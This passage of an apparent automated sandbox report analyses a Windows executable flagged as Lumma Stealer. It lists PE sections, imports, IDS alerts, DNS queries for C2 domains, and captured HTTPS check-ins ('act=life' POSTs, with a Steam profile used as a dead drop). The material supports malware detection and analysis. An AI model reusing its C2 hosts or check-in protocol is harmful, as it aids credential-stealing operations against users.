.symtab	0xb85000	0x4	0x200	07b5472d347d42780469fb2654b7fc54	False	0.02734375	data	0.020393135236084953	IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.rsrc	0xb86000	0x3e74	0x4000	3dd5ccb7ab72d1dacf9f1b78a96cf330	False	0.82464599609375	data	7.523133778446167	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xb861b0	0x3191	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced			0.953897076207739
RT_GROUP_ICON	0xb89344	0x14	data			1.05
RT_VERSION	0xb89358	0x4f0	SysEx File - Moog			0.2903481012658228
RT_MANIFEST	0xb89848	0x62c	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.4240506329113924

Imports

DLL

Import

kernel32.dll

WriteFile, WriteConsoleW, WerSetFlags, WerGetFlags, WaitForMultipleObjects, WaitForSingleObject, VirtualQuery, VirtualFree, VirtualAlloc, TlsAlloc, SwitchToThread, SuspendThread, SetWaitableTimer, SetUnhandledExceptionFilter, SetProcessPriorityBoost, SetEvent, SetErrorMode, SetConsoleCtrlHandler, ResumeThread, RaiseFailFastException, PostQueuedCompletionStatus, LoadLibraryW, LoadLibraryExW, SetThreadContext, GetThreadContext, GetSystemInfo, GetSystemDirectoryA, GetStdHandle, GetQueuedCompletionStatusEx, GetProcessAffinityMask, GetProcAddress, GetErrorMode, GetEnvironmentStringsW, GetCurrentThreadId, GetConsoleMode, FreeEnvironmentStringsW, ExitProcess, DuplicateHandle, CreateWaitableTimerExW, CreateThread, CreateIoCompletionPort, CreateFileA, CreateEventA, CloseHandle, AddVectoredExceptionHandler

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-02T15:06:53.273795+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.5	49716	188.114.96.3	443	TCP
2024-10-02T15:06:53.273795+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49716	188.114.96.3	443	TCP
2024-10-02T15:06:53.312369+0200	2056338	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (famikyjdiag .site)	1	192.168.2.5	55295	1.1.1.1	53	UDP
2024-10-02T15:06:53.331397+0200	2056340	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (possiwreeste .site)	1	192.168.2.5	55420	1.1.1.1	53	UDP
2024-10-02T15:06:53.361667+0200	2056334	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (commandejorsk .site)	1	192.168.2.5	64435	1.1.1.1	53	UDP
2024-10-02T15:06:53.373584+0200	2056344	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (underlinemdsj .site)	1	192.168.2.5	56083	1.1.1.1	53	UDP
2024-10-02T15:06:53.383964+0200	2056328	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bellykmrebk .site)	1	192.168.2.5	65172	1.1.1.1	53	UDP
2024-10-02T15:06:53.414396+0200	2056324	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (agentyanlark .site)	1	192.168.2.5	61034	1.1.1.1	53	UDP
2024-10-02T15:06:53.426398+0200	2056346	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (writekdmsnu .site)	1	192.168.2.5	64373	1.1.1.1	53	UDP
2024-10-02T15:06:53.437360+0200	2056336	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (delaylacedmn .site)	1	192.168.2.5	56558	1.1.1.1	53	UDP
2024-10-02T15:06:55.637733+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.5	49718	172.67.209.193	443	TCP
2024-10-02T15:06:55.637733+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49718	172.67.209.193	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 2, 2024 15:06:52.125780106 CEST	49716	443	192.168.2.5	188.114.96.3
Oct 2, 2024 15:06:52.125845909 CEST	443	49716	188.114.96.3	192.168.2.5
Oct 2, 2024 15:06:52.126120090 CEST	49716	443	192.168.2.5	188.114.96.3
Oct 2, 2024 15:06:52.127219915 CEST	49716	443	192.168.2.5	188.114.96.3
Oct 2, 2024 15:06:52.127240896 CEST	443	49716	188.114.96.3	192.168.2.5
Oct 2, 2024 15:06:52.588068962 CEST	443	49716	188.114.96.3	192.168.2.5
Oct 2, 2024 15:06:52.588241100 CEST	49716	443	192.168.2.5	188.114.96.3
Oct 2, 2024 15:06:52.592528105 CEST	49716	443	192.168.2.5	188.114.96.3
Oct 2, 2024 15:06:52.592545033 CEST	443	49716	188.114.96.3	192.168.2.5
Oct 2, 2024 15:06:52.592813969 CEST	443	49716	188.114.96.3	192.168.2.5
Oct 2, 2024 15:06:52.636539936 CEST	49716	443	192.168.2.5	188.114.96.3
Oct 2, 2024 15:06:52.860266924 CEST	49716	443	192.168.2.5	188.114.96.3
Oct 2, 2024 15:06:52.860266924 CEST	49716	443	192.168.2.5	188.114.96.3
Oct 2, 2024 15:06:52.860420942 CEST	443	49716	188.114.96.3	192.168.2.5
Oct 2, 2024 15:06:53.273771048 CEST	443	49716	188.114.96.3	192.168.2.5
Oct 2, 2024 15:06:53.273843050 CEST	443	49716	188.114.96.3	192.168.2.5
Oct 2, 2024 15:06:53.273955107 CEST	49716	443	192.168.2.5	188.114.96.3
Oct 2, 2024 15:06:53.300729036 CEST	49716	443	192.168.2.5	188.114.96.3
Oct 2, 2024 15:06:53.300761938 CEST	443	49716	188.114.96.3	192.168.2.5
Oct 2, 2024 15:06:53.300781012 CEST	49716	443	192.168.2.5	188.114.96.3
Oct 2, 2024 15:06:53.300798893 CEST	443	49716	188.114.96.3	192.168.2.5
Oct 2, 2024 15:06:53.455777884 CEST	49717	443	192.168.2.5	104.102.49.254
Oct 2, 2024 15:06:53.455872059 CEST	443	49717	104.102.49.254	192.168.2.5
Oct 2, 2024 15:06:53.455955982 CEST	49717	443	192.168.2.5	104.102.49.254
Oct 2, 2024 15:06:53.456238985 CEST	49717	443	192.168.2.5	104.102.49.254
Oct 2, 2024 15:06:53.456270933 CEST	443	49717	104.102.49.254	192.168.2.5
Oct 2, 2024 15:06:54.115632057 CEST	443	49717	104.102.49.254	192.168.2.5
Oct 2, 2024 15:06:54.115761995 CEST	49717	443	192.168.2.5	104.102.49.254
Oct 2, 2024 15:06:54.117558002 CEST	49717	443	192.168.2.5	104.102.49.254
Oct 2, 2024 15:06:54.117572069 CEST	443	49717	104.102.49.254	192.168.2.5
Oct 2, 2024 15:06:54.117813110 CEST	443	49717	104.102.49.254	192.168.2.5
Oct 2, 2024 15:06:54.123147964 CEST	49717	443	192.168.2.5	104.102.49.254
Oct 2, 2024 15:06:54.163429022 CEST	443	49717	104.102.49.254	192.168.2.5
Oct 2, 2024 15:06:54.594494104 CEST	443	49717	104.102.49.254	192.168.2.5
Oct 2, 2024 15:06:54.594512939 CEST	443	49717	104.102.49.254	192.168.2.5
Oct 2, 2024 15:06:54.594548941 CEST	443	49717	104.102.49.254	192.168.2.5
Oct 2, 2024 15:06:54.594577074 CEST	49717	443	192.168.2.5	104.102.49.254
Oct 2, 2024 15:06:54.594614029 CEST	443	49717	104.102.49.254	192.168.2.5
Oct 2, 2024 15:06:54.594629049 CEST	49717	443	192.168.2.5	104.102.49.254
Oct 2, 2024 15:06:54.594659090 CEST	49717	443	192.168.2.5	104.102.49.254
Oct 2, 2024 15:06:54.692925930 CEST	443	49717	104.102.49.254	192.168.2.5
Oct 2, 2024 15:06:54.692950010 CEST	443	49717	104.102.49.254	192.168.2.5
Oct 2, 2024 15:06:54.693118095 CEST	49717	443	192.168.2.5	104.102.49.254
Oct 2, 2024 15:06:54.693144083 CEST	443	49717	104.102.49.254	192.168.2.5
Oct 2, 2024 15:06:54.693188906 CEST	49717	443	192.168.2.5	104.102.49.254
Oct 2, 2024 15:06:54.700539112 CEST	443	49717	104.102.49.254	192.168.2.5
Oct 2, 2024 15:06:54.700630903 CEST	49717	443	192.168.2.5	104.102.49.254
Oct 2, 2024 15:06:54.700639009 CEST	443	49717	104.102.49.254	192.168.2.5
Oct 2, 2024 15:06:54.700658083 CEST	443	49717	104.102.49.254	192.168.2.5
Oct 2, 2024 15:06:54.700685978 CEST	49717	443	192.168.2.5	104.102.49.254
Oct 2, 2024 15:06:54.700716019 CEST	49717	443	192.168.2.5	104.102.49.254
Oct 2, 2024 15:06:54.700761080 CEST	49717	443	192.168.2.5	104.102.49.254
Oct 2, 2024 15:06:54.700776100 CEST	443	49717	104.102.49.254	192.168.2.5
Oct 2, 2024 15:06:54.700783968 CEST	49717	443	192.168.2.5	104.102.49.254
Oct 2, 2024 15:06:54.700788021 CEST	443	49717	104.102.49.254	192.168.2.5
Oct 2, 2024 15:06:54.718211889 CEST	49718	443	192.168.2.5	172.67.209.193
Oct 2, 2024 15:06:54.718245983 CEST	443	49718	172.67.209.193	192.168.2.5
Oct 2, 2024 15:06:54.718427896 CEST	49718	443	192.168.2.5	172.67.209.193
Oct 2, 2024 15:06:54.718760014 CEST	49718	443	192.168.2.5	172.67.209.193
Oct 2, 2024 15:06:54.718777895 CEST	443	49718	172.67.209.193	192.168.2.5
Oct 2, 2024 15:06:55.191828012 CEST	443	49718	172.67.209.193	192.168.2.5
Oct 2, 2024 15:06:55.191894054 CEST	49718	443	192.168.2.5	172.67.209.193
Oct 2, 2024 15:06:55.193399906 CEST	49718	443	192.168.2.5	172.67.209.193
Oct 2, 2024 15:06:55.193406105 CEST	443	49718	172.67.209.193	192.168.2.5
Oct 2, 2024 15:06:55.193658113 CEST	443	49718	172.67.209.193	192.168.2.5
Oct 2, 2024 15:06:55.194792032 CEST	49718	443	192.168.2.5	172.67.209.193
Oct 2, 2024 15:06:55.194814920 CEST	49718	443	192.168.2.5	172.67.209.193
Oct 2, 2024 15:06:55.194889069 CEST	443	49718	172.67.209.193	192.168.2.5
Oct 2, 2024 15:06:55.637645960 CEST	443	49718	172.67.209.193	192.168.2.5
Oct 2, 2024 15:06:55.637732983 CEST	443	49718	172.67.209.193	192.168.2.5
Oct 2, 2024 15:06:55.637937069 CEST	49718	443	192.168.2.5	172.67.209.193
Oct 2, 2024 15:06:55.637988091 CEST	49718	443	192.168.2.5	172.67.209.193
Oct 2, 2024 15:06:55.638004065 CEST	443	49718	172.67.209.193	192.168.2.5
Oct 2, 2024 15:06:55.638015985 CEST	49718	443	192.168.2.5	172.67.209.193
Oct 2, 2024 15:06:55.638020992 CEST	443	49718	172.67.209.193	192.168.2.5

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 2, 2024 15:06:52.101840019 CEST	61226	53	192.168.2.5	1.1.1.1
Oct 2, 2024 15:06:52.115379095 CEST	53	61226	1.1.1.1	192.168.2.5
Oct 2, 2024 15:06:53.312369108 CEST	55295	53	192.168.2.5	1.1.1.1
Oct 2, 2024 15:06:53.321273088 CEST	53	55295	1.1.1.1	192.168.2.5
Oct 2, 2024 15:06:53.331397057 CEST	55420	53	192.168.2.5	1.1.1.1
Oct 2, 2024 15:06:53.357609034 CEST	53	55420	1.1.1.1	192.168.2.5
Oct 2, 2024 15:06:53.361666918 CEST	64435	53	192.168.2.5	1.1.1.1
Oct 2, 2024 15:06:53.370754004 CEST	53	64435	1.1.1.1	192.168.2.5
Oct 2, 2024 15:06:53.373584032 CEST	56083	53	192.168.2.5	1.1.1.1
Oct 2, 2024 15:06:53.381855965 CEST	53	56083	1.1.1.1	192.168.2.5
Oct 2, 2024 15:06:53.383964062 CEST	65172	53	192.168.2.5	1.1.1.1
Oct 2, 2024 15:06:53.408977032 CEST	53	65172	1.1.1.1	192.168.2.5
Oct 2, 2024 15:06:53.414396048 CEST	61034	53	192.168.2.5	1.1.1.1
Oct 2, 2024 15:06:53.424204111 CEST	53	61034	1.1.1.1	192.168.2.5
Oct 2, 2024 15:06:53.426398039 CEST	64373	53	192.168.2.5	1.1.1.1
Oct 2, 2024 15:06:53.435318947 CEST	53	64373	1.1.1.1	192.168.2.5
Oct 2, 2024 15:06:53.437360048 CEST	56558	53	192.168.2.5	1.1.1.1
Oct 2, 2024 15:06:53.446578026 CEST	53	56558	1.1.1.1	192.168.2.5
Oct 2, 2024 15:06:53.447705984 CEST	50336	53	192.168.2.5	1.1.1.1
Oct 2, 2024 15:06:53.454999924 CEST	53	50336	1.1.1.1	192.168.2.5
Oct 2, 2024 15:06:54.707521915 CEST	55390	53	192.168.2.5	1.1.1.1
Oct 2, 2024 15:06:54.717061996 CEST	53	55390	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 2, 2024 15:06:52.101840019 CEST	192.168.2.5	1.1.1.1	0x7339	Standard query (0)	nurserrsjwuwq.shop	A (IP address)	IN (0x0001)	false
Oct 2, 2024 15:06:53.312369108 CEST	192.168.2.5	1.1.1.1	0xa1aa	Standard query (0)	famikyjdiag.site	A (IP address)	IN (0x0001)	false
Oct 2, 2024 15:06:53.331397057 CEST	192.168.2.5	1.1.1.1	0xa830	Standard query (0)	possiwreeste.site	A (IP address)	IN (0x0001)	false
Oct 2, 2024 15:06:53.361666918 CEST	192.168.2.5	1.1.1.1	0x31cb	Standard query (0)	commandejorsk.site	A (IP address)	IN (0x0001)	false
Oct 2, 2024 15:06:53.373584032 CEST	192.168.2.5	1.1.1.1	0x8a96	Standard query (0)	underlinemdsj.site	A (IP address)	IN (0x0001)	false
Oct 2, 2024 15:06:53.383964062 CEST	192.168.2.5	1.1.1.1	0xa2c6	Standard query (0)	bellykmrebk.site	A (IP address)	IN (0x0001)	false
Oct 2, 2024 15:06:53.414396048 CEST	192.168.2.5	1.1.1.1	0x9119	Standard query (0)	agentyanlark.site	A (IP address)	IN (0x0001)	false
Oct 2, 2024 15:06:53.426398039 CEST	192.168.2.5	1.1.1.1	0x9d88	Standard query (0)	writekdmsnu.site	A (IP address)	IN (0x0001)	false
Oct 2, 2024 15:06:53.437360048 CEST	192.168.2.5	1.1.1.1	0x140c	Standard query (0)	delaylacedmn.site	A (IP address)	IN (0x0001)	false
Oct 2, 2024 15:06:53.447705984 CEST	192.168.2.5	1.1.1.1	0x67d2	Standard query (0)	steamcommunity.com	A (IP address)	IN (0x0001)	false
Oct 2, 2024 15:06:54.707521915 CEST	192.168.2.5	1.1.1.1	0x6941	Standard query (0)	gravvitywio.store	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 2, 2024 15:06:52.115379095 CEST	1.1.1.1	192.168.2.5	0x7339	No error (0)	nurserrsjwuwq.shop		188.114.96.3	A (IP address)	IN (0x0001)	false
Oct 2, 2024 15:06:52.115379095 CEST	1.1.1.1	192.168.2.5	0x7339	No error (0)	nurserrsjwuwq.shop		188.114.97.3	A (IP address)	IN (0x0001)	false
Oct 2, 2024 15:06:53.321273088 CEST	1.1.1.1	192.168.2.5	0xa1aa	Name error (3)	famikyjdiag.site	none	none	A (IP address)	IN (0x0001)	false
Oct 2, 2024 15:06:53.357609034 CEST	1.1.1.1	192.168.2.5	0xa830	Name error (3)	possiwreeste.site	none	none	A (IP address)	IN (0x0001)	false
Oct 2, 2024 15:06:53.370754004 CEST	1.1.1.1	192.168.2.5	0x31cb	Name error (3)	commandejorsk.site	none	none	A (IP address)	IN (0x0001)	false
Oct 2, 2024 15:06:53.381855965 CEST	1.1.1.1	192.168.2.5	0x8a96	Name error (3)	underlinemdsj.site	none	none	A (IP address)	IN (0x0001)	false
Oct 2, 2024 15:06:53.408977032 CEST	1.1.1.1	192.168.2.5	0xa2c6	Name error (3)	bellykmrebk.site	none	none	A (IP address)	IN (0x0001)	false
Oct 2, 2024 15:06:53.424204111 CEST	1.1.1.1	192.168.2.5	0x9119	Name error (3)	agentyanlark.site	none	none	A (IP address)	IN (0x0001)	false
Oct 2, 2024 15:06:53.435318947 CEST	1.1.1.1	192.168.2.5	0x9d88	Name error (3)	writekdmsnu.site	none	none	A (IP address)	IN (0x0001)	false
Oct 2, 2024 15:06:53.446578026 CEST	1.1.1.1	192.168.2.5	0x140c	Name error (3)	delaylacedmn.site	none	none	A (IP address)	IN (0x0001)	false
Oct 2, 2024 15:06:53.454999924 CEST	1.1.1.1	192.168.2.5	0x67d2	No error (0)	steamcommunity.com		104.102.49.254	A (IP address)	IN (0x0001)	false
Oct 2, 2024 15:06:54.717061996 CEST	1.1.1.1	192.168.2.5	0x6941	No error (0)	gravvitywio.store		172.67.209.193	A (IP address)	IN (0x0001)	false
Oct 2, 2024 15:06:54.717061996 CEST	1.1.1.1	192.168.2.5	0x6941	No error (0)	gravvitywio.store		104.21.16.12	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

nurserrsjwuwq.shop

steamcommunity.com

gravvitywio.store

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49716	188.114.96.3	443	6572	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 13:06:52 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: nurserrsjwuwq.shop
2024-10-02 13:06:52 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-10-02 13:06:53 UTC	784	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 13:06:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=p9jqur5rheothrhn4rs55krr39; expires=Sun, 26 Jan 2025 06:53:32 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ag0L%2BHuNK6XzrP%2BCuTud5mfVA2yC%2FNJ1kqS%2B5Z71AZAhoqrdlsxi0tbLO4R1fL%2FVYeN7NWXbDKVKVsy%2FztX%2FI96CfR%2BVb0cWs2AAw5UiRY5dirrtGiIgojv9Stw7RiVeU7Bn%2Fcg%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cc4e988bbde5e6d-EWR
2024-10-02 13:06:53 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-10-02 13:06:53 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49717	104.102.49.254	443	6572	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 13:06:54 UTC	219	OUT	GET /profiles/76561199724331900 HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: steamcommunity.com
2024-10-02 13:06:54 UTC	1870	IN	HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=UTF-8 Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED] Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache Date: Wed, 02 Oct 2024 13:06:54 GMT Content-Length: 34837 Connection: close Set-Cookie: sessionid=839e6b3fb1b37bd453756cf3; Path=/; Secure; SameSite=None Set-Cookie: steamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=None
2024-10-02 13:06:54 UTC	14514	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
2024-10-02 13:06:54 UTC	16384	IN	Data Raw: 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0d 0a 09 09 6a 51 75 65 72 79 28 66 75 6e 63 74 69 6f 6e 28 24 29 20 7b 0d 0a 09 09 09 24 28 27 23 67 6c 6f 62 61 6c 5f 68 65 61 64 65 72 20 2e 73 75 70 65 72 6e 61 76 27 29 2e 76 5f 74 6f 6f 6c 74 69 70 28 7b 27 6c 6f 63 61 74 69 6f 6e 27 3a 27 62 6f 74 74 6f 6d 27 2c 20 27 64 65 73 74 72 6f 79 57 68 65 6e 44 6f 6e 65 27 3a 20 66 61 6c 73 65 2c 20 27 74 6f 6f 6c 74 69 70 43 6c 61 73 73 27 3a 20 27 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 65 6e 74 27 2c 20 27 6f 66 66 73 65 74 59 27 3a 2d 36 2c 20 27 6f 66 66 73 65 74 58 27 3a 20 31 2c 20 27 68 6f 72 69 7a 6f 6e 74 61 6c 53 6e 61 70 27 3a 20 34 2c 20 27 74 6f 6f 6c 74 69 70 50 61 72 65 6e 74 27 3a 20 27 23 67 6c 6f Data Ascii: <script type="text/javascript">jQuery(function($) {$('#global_header .supernav').v_tooltip({'location':'bottom', 'destroyWhenDone': false, 'tooltipClass': 'supernav_content', 'offsetY':-6, 'offsetX': 1, 'horizontalSnap': 4, 'tooltipParent': '#glo
2024-10-02 13:06:54 UTC	3768	IN	Data Raw: 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 73 75 6d 6d 61 72 79 5f 66 6f 6f 74 65 72 22 3e 0d 0a 09 09 09 09 09 09 09 3c 73 70 61 6e 20 64 61 74 61 2d 70 61 6e 65 6c 3d 22 7b 26 71 75 6f 74 3b 66 6f 63 75 73 61 62 6c 65 26 71 75 6f 74 3b 3a 74 72 75 65 2c 26 71 75 6f 74 3b 63 6c 69 63 6b 4f 6e 41 63 74 69 76 61 74 65 26 71 75 6f 74 3b 3a 74 72 75 65 7d 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 3e 56 69 65 77 20 6d 6f 72 65 20 69 6e 66 6f 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 20 24 4a 28 20 66 75 6e 63 74 69 6f 6e 28 29 Data Ascii: <div class="profile_summary_footer"><span data-panel="{"focusable":true,"clickOnActivate":true}" class="whiteLink" class="whiteLink">View more info</span></div><script type="text/javascript"> $J( function()
2024-10-02 13:06:54 UTC	171	IN	Data Raw: 09 3c 73 70 61 6e 3e 56 69 65 77 20 6d 6f 62 69 6c 65 20 77 65 62 73 69 74 65 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 0d 0a 09 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 63 6f 6e 74 65 6e 74 20 2d 2d 3e 0d 0a 0d 0a 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 66 72 61 6d 65 20 2d 2d 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <span>View mobile website</span></div></div></div></div>... responsive_page_content --></div>... responsive_page_frame --></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49718	172.67.209.193	443	6572	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 13:06:55 UTC	264	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: gravvitywio.store
2024-10-02 13:06:55 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-10-02 13:06:55 UTC	776	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 13:06:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=nho7o5vunj6ef40b5gq67tb3ij; expires=Sun, 26 Jan 2025 06:53:34 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OX3%2FauQ77jyRFEMtBtrkrQAvx0lPBgTFCHgCYrMPvIUZC7ldr9NohUrX3YbnB3zUNXt%2FRXJNDwRWL9tKulzCL%2ByF%2BsPpmWN1x5PtPFWTBFGArTNOA8ZHqHhAXhAtQWFX2lvdcA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cc4e9977d52de98-EWR
2024-10-02 13:06:55 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-10-02 13:06:55 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	09:06:32
Start date:	02/10/2024
Path:	C:\Users\user\Desktop\webNY0O9Sr.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\webNY0O9Sr.exe"
Imagebase:	0x760000
File size:	11'801'336 bytes
MD5 hash:	D3A46BD951E1BB457349DAC15C09098E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000000.00000002.2258275643.00000000025D4000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Msfpayloads_msf_9, Description: Metasploit Payloads - file msf.war - contents, Source: 00000000.00000002.2258275643.0000000002400000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000000.00000002.2258275643.0000000002577000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Msfpayloads_msf_9, Description: Metasploit Payloads - file msf.war - contents, Source: 00000000.00000002.2258275643.00000000024DC000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	09:06:41
Start date:	02/10/2024
